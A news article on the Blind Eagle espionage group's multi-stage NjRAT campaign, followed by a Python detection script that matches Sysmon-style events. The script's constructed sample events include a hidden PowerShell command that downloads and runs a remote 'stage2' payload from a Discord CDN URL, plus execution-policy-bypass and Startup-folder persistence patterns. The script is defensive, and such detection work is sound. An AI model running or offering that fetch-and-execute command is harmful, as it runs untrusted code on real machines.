Researchers at the information-security company ThreatMon have reported that the Blind Eagle cyber-espionage group is running a new multi-stage attack chain. The chain ends with the deployment of the NjRAT remote access trojan (RAT) on compromised systems.
Blind Eagle (also tracked as APT-C-36) is believed to be a Spanish-speaking group operating out of South America. It has targeted private- and public-sector organizations in Colombia, Ecuador, Chile and Spain.
The campaign uncovered by ThreatMon proceeds in several stages. Initial access is gained through a malware-as-a-service (RaaS) offering, social engineering, or phishing. A JavaScript loader is then dropped onto the system; it executes a PowerShell script hosted on the Discord CDN. That script downloads a second PowerShell script and a Windows batch file, and writes a VBScript file into the Windows Startup folder for persistence. The batch file is responsible for launching the PowerShell scripts that were downloaded alongside it. In the final stage, NjRAT is installed on the system.
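As an added illustration of how a defender might look for this chain in endpoint telemetry (this is example code written for this article, not anything published by ThreatMon or BlackBerry), the script below runs three coarse rules over constructed, Sysmon-style process-creation and file-creation events: a script host (wscript/cscript) spawning powershell.exe with a command line that fetches from the Discord CDN, a .vbs file written into a user's Startup folder, and a batch file (cmd.exe /c something.bat) launching powershell.exe. The event field names, file paths, URLs and the sample events themselves are assumptions made for the example, not indicators from the reports.

```python
import re
from dataclasses import dataclass

# Assumed process/path conventions for this example (not indicators from the page).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DISCORD_CDN_RE = re.compile(r"cdn\.discordapp\.com", re.IGNORECASE)
STARTUP_VBS_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.vbs$",
    re.IGNORECASE,
)


@dataclass
class Event:
    """One Sysmon-style event; the field names are this example's own convention."""
    kind: str                 # "proc" = process creation, "file" = file creation
    image: str                # image of the new process (proc) or writing process (file)
    parent: str = ""          # parent image (proc events)
    parent_cmdline: str = ""  # parent command line (proc events)
    cmdline: str = ""         # command line of the new process (proc events)
    target: str = ""          # path written (file events)


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, detail) pairs, one per event that matches a stage rule."""
    findings = []
    for ev in events:
        if ev.kind == "proc" and basename(ev.image) == "powershell.exe":
            parent = basename(ev.parent)
            # Stage 1: the JavaScript loader, run by a script host, pulls the
            # next PowerShell stage from the Discord CDN.
            if parent in SCRIPT_HOSTS and DISCORD_CDN_RE.search(ev.cmdline):
                findings.append(("js_loader_fetches_discord_cdn", ev.cmdline))
            # Stage 3: a batch file (cmd.exe /c x.bat) launches PowerShell to
            # run the previously downloaded scripts.
            elif parent == "cmd.exe" and ".bat" in ev.parent_cmdline.lower():
                findings.append(("batch_launches_powershell", ev.parent_cmdline))
        # Stage 2: persistence via a .vbs dropped into a Startup folder.
        elif ev.kind == "file" and STARTUP_VBS_RE.search(ev.target):
            findings.append(("vbs_dropped_in_startup", ev.target))
    return findings


FULL_CHAIN = {
    "js_loader_fetches_discord_cdn",
    "vbs_dropped_in_startup",
    "batch_launches_powershell",
}


def is_full_chain(findings) -> bool:
    """True when every stage rule fired at least once in the event stream."""
    return FULL_CHAIN <= {rule for rule, _ in findings}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry for this example; not real events from the campaign.
SAMPLE_EVENTS = [
    Event("proc", PS, parent=r"C:\Windows\System32\wscript.exe",
          cmdline="powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('https://cdn.discordapp.com/attachments/123/456/stage2.txt')\""),
    Event("file", PS,
          target=r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"),
    Event("proc", PS, parent=r"C:\Windows\System32\cmd.exe",
          parent_cmdline=r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat",
          cmdline=r"powershell.exe -ep bypass -f C:\Users\alice\AppData\Local\Temp\stage3.ps1"),
    # Benign noise: an administrator opening PowerShell from Explorer.
    Event("proc", PS, parent=r"C:\Windows\explorer.exe", cmdline="powershell.exe"),
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
    print("full chain observed:", is_full_chain(analyze(SAMPLE_EVENTS)))
```

The rules are deliberately coarse: a batch file launching PowerShell is common in legitimate administration, so in practice the third rule would be scoped to user-writable directories and combined with the other two, which is what `is_full_chain` does for the constructed stream.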
NjRAT (also known as Bladabindi) was first observed in 2013. It has a wide range of capabilities that let attackers collect sensitive information and take control of compromised machines. Once installed, NjRAT gives its operators full remote access to the host: they can run additional malware, modify the Windows Registry, download and delete files, execute commands, exfiltrate data from the computer, log keystrokes, steal passwords, terminate processes and take screenshots.
On February 27, BlackBerry's research team reported that Blind Eagle had impersonated the national tax agencies of Colombia and Ecuador in order to steal information from government, financial and many other organizations in those countries.
It is a worrying situation that cybersecurity experts are keeping an eye on.